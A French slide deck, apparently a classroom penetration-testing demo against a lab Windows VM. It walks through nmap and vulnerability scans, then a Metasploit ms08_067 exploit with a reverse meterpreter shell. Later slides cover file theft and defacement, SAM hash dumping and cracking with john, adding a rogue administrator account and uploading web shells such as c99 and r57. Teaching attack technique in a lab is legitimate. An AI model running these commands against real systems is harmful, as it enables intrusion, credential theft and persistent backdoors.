2. 1- PROBE : 45’
• Démarrer VM web et Kali
• Ouvrir le site web http://www.culture-velo.com
• Ping www.culture-velo.com
• ->adresse ip
Marc Arnaert 2
3. Sous Kali : Nmap
• Ouvrir une session (root/root) et demarrer ssh
• Ping 192.168.10.200
• -> on atteint la machine
• On scan en TCP
• nmap -sS -vv 192.168.10.200
• –sS : Type de Scan TCP SYN et –vv : verbose
• On commente les 8 ports ouverts
• nmap -sS -vv -O 192.168.10.200
• -O : Permet d’avoir la detection de l’OS
• nmap : pour montrer la liste des commandes dispo
Marc Arnaert 3
4. Sous Kali : ZenMap
• Menu haut Applications / 1- Inf. gathering / Zenmap
• Target : Mettre 192.168.10.200
• Profile : en Slow comprehensive scan
• Attendre le service scan Timing finisse (2 minutes)
• Attendre que le NSE Timing finisse (4 minutes)
• En attendant, on peut passer à Nessus
Marc Arnaert 4
5. Sous Kali : ZenMap
• Une fois le scan terminé, remonter vers le haut.
• Commenter les ports ouvert en VERT
• La version du service, l’éditeur,
• le nom netbios de la machine
• Discuter du contenu http puis descendre
• Expliquer les méthodes supportées et les risques
avérés.
• Discuter du 3389 et du chiffrement RC4
Marc Arnaert 5
6. Sous Kali : ZenMap
• Il y a 9 services vert dont le ntp en plus
• Il y a 6 services en plus mais filtré
• Discuter de la partie smb
– Nom de l’ordinateur
– Son groupe d’appartenance
– La signature des messages désactivé
Marc Arnaert 6
7. Nessus
• Lancer le service : service nessusd start
• Lancer un navigateur sur https://localhost:8834
• S’identifier admin / root
• Cliquer sur NEW scan en haut à droite
• On choisi Basic Network Scan
• Remplir : le nom et l’adresse ip
Marc Arnaert 7
9. • Lancez un nouveau Scan :
• Pour faire patienter, revenir sur ZENMAP
• Revenir pour vérifier que Nessus à fini
• Lancer OpenVas puis revenir ici
Marc Arnaert 9
10. NESSUS - Resultat
• On clic sur le résultat
• 17 vulnérabilités
• On clic sur le rouge
• Commenter le 067
• Faire un export
Marc Arnaert 10
11. openvas
• service postgresql start
• Applications / 2 – Vulnerability analysis / openvas start
• https://localhost:9392
• admin / root
• Configuration / Target / Etoile bleue à gauche
• Name : www.culture-velo.com
• Manual et 192.168.10.200
• Port List : All privileged tcp (commenter)
• Alive Test : consider alive
• Create
Marc Arnaert 11
12. openvas
• Choisir Scan puis Tasks puis l’étoile bleue
• Name : Tache1
• Create
• Lancement par la flèche verte (5minutes)
• Retourner à Nessus,
Marc Arnaert 12
13. Nikto & Uniscan : vulnérabilité web
• Lancez en shell Kali :
• nikto -h 192.168.10.200
• Explorons maintenant des scanners qui
permettent de tester des injections SQL ou faire
du XSS :
• Lancez en shell Kali :
• uniscan -u http://192.168.10.200 -ds
Marc Arnaert 13
14. Fin Probe
• Qu’est ce que l’on a pu voir dans cette 1er partie ?
• Différents type de scan
• Différents type de port
• Service associés aux ports
• Vulnérabilités connus en rapport service / port
• -> PENETRATE
Marc Arnaert 14
15. 2 - PENETRATE 20’
• cd /root; mkdir hack; cd hack
• msfconsole
• use windows/smb/ms08_067_netapi
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.10.129
• set rhost 192.168.10.200
• set lport 4444
• set rport 445
Marc Arnaert 15
17. Sur le hôte distant
• cd
• cd Documents and Settings
• cd administrateur
• cd Bureau
• dir
Commenter le fichier ultraconfidentiel
mkdir HACK
Aller voir le bureau de la vulnérable : commentez
Marc Arnaert 17
18. Exfiltration de données
• Exit
• cd ..
• cd ..
• cd “Documents and Settings”
• cd administrateur
• cd Bureau
• ls
Marc Arnaert 18
19. Modification de données
• Ouvrir un autre ssh
• Aller dans /root/hack
• Faire un ls et revenir sous meterpreter
• download ultra_confidentiel.txt
• Visualiser le fichier ultra_confidentiel
• Ajouter au début :ANONYMOUS ARE HERE !!!
• Faire un ls et revenir sous meterpreter
• upload ultra_confidentiel.txt
• Aller sur la vm, commenter le fichier modifié
Marc Arnaert 19
20. Capture d’écran à distance
• Revenir sous metasploit et lancer
• Screenshot
• Ouvrir un filezilla sur roothack
• Récupérer l’image et commenter
Marc Arnaert 20
21. Export des mots de passe
Sous metasploit :
• shell
• reg save HKLMSAM c:SAM
• reg save HKLMSYSTEM c:SYSTEM
• exit
• cd /
• download sam
• download system
Marc Arnaert 21
22. Casses des mots de passe
• Dans l’autre ssh sous /root/hack
• pwdump system sam
• pwdump system sam > hash.txt
• Ouvrir hash.txt pour voir la ligne admin.
• john hash.txt --format=NT
• Commenter le mot de passe cracké
Marc Arnaert 22
27. HACK !
• Et voilà :
• Clic droit / meterpreter / Explore /
-> Browse files
-> ScreenShoot
• Commenter ….
Marc Arnaert 27
28. 3 – PERSIST 10’
• Fermer la session sur vulnérable
• Changement du mot de passe de la vulnerable
• Retourner dans le ssh metasploit
• shell
• net user administrateur anonymous
• Aller sur la machine vulnerable et ouvrir avec
le mot de passe maison : echec
• Utiliser anonymous et commenter !!
Marc Arnaert 28
29. Elévation de privilèges
• Ouvrir le gestionnaire des utilisateurs et
montrer que l’utilisateur hack n’existe pas
• Lancer une commande :
• net user hack anonymous /add
• net localgroup administrateurs hack /add
Marc Arnaert 29
30. Elévation de privilèges
• Aller sur la vulnérable
• Fermer la session
• Seule la session HACK est présente
• Ouvrir la session HACK / anonymous
Marc Arnaert 30
31. Comment Persist
• Changer le mot de passe administrateurs
• Creation d’un compte de hack
• Elevation de privileges sur le compte
• Vérifier le site web http://192.168.10.200
Marc Arnaert 31
32. 4 – PARALYSE 15’
• Dechiffrer backdoor.zipe.pae (mdp backdoor)
• copier backdoor.zipe via ftp sous /root/hack
• cd /root/hack
• Le renommer en backdoor.zip
• mv backdoor.zipe backdoor.zip
• unzip backdoor.zip
Marc Arnaert 32
33. Infiltration de backdoor
• revenir sous armitage,
• se placer sous c:Inetpubwwwrootshop
• et uploader
• Simattacker, tryag,
• c99, dq, r57,
• cwshelldumper,
Marc Arnaert 33